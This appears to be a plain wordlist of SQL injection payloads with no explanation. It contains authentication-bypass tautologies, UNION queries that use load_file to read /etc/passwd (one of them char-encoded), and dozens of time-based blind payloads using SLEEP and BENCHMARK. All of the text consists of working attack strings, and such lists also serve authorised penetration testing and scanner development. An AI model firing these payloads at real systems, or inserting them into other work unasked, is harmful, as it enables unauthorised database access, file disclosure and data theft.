1
1'1
1 and 1=1
1' and 1=(select count(*) from tablenames); --
' or 1=1-- 
or 1=1
; or '1'='1'
" or isNULL(1/0) /*
' or '7659'='7659
' -- 
' or 1=1--
" or 1=1--
' or 1=1 /*
 or isNULL(1/0) /*
' union select 1,load_file('/etc/passwd'),1,1,1;
1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
' OR IF(1=1,SLEEP(5),0)-- 
" OR IF(1=1,SLEEP(5),0)-- 
1 AND SLEEP(5)-- 
1' AND SLEEP(5)-- 
1' AND IF(1=1,SLEEP(5),0)-- 
' OR BENCHMARK(1000000,MD5(1))-- 
1' AND BENCHMARK(1000000,MD5(1))-- 
1 AND SLEEP(5)-- 
1 AND IF(1=1,SLEEP(5),0)-- 
' AND SLEEP(5)-- 
' AND IF(1=1,SLEEP(5),0)-- 
1) AND SLEEP(5)-- 
1') AND SLEEP(5)-- 
',SLEEP(5),'
'),SLEEP(5),('
',IF(1=1,SLEEP(5),0),'
0),(SELECT SLEEP(5)),0
1 ORDER BY IF(1=1,SLEEP(5),1)-- 
1 ORDER BY (SELECT IF(1=1,SLEEP(5),1))-- 
1 ORDER BY 1,SLEEP(5)-- 

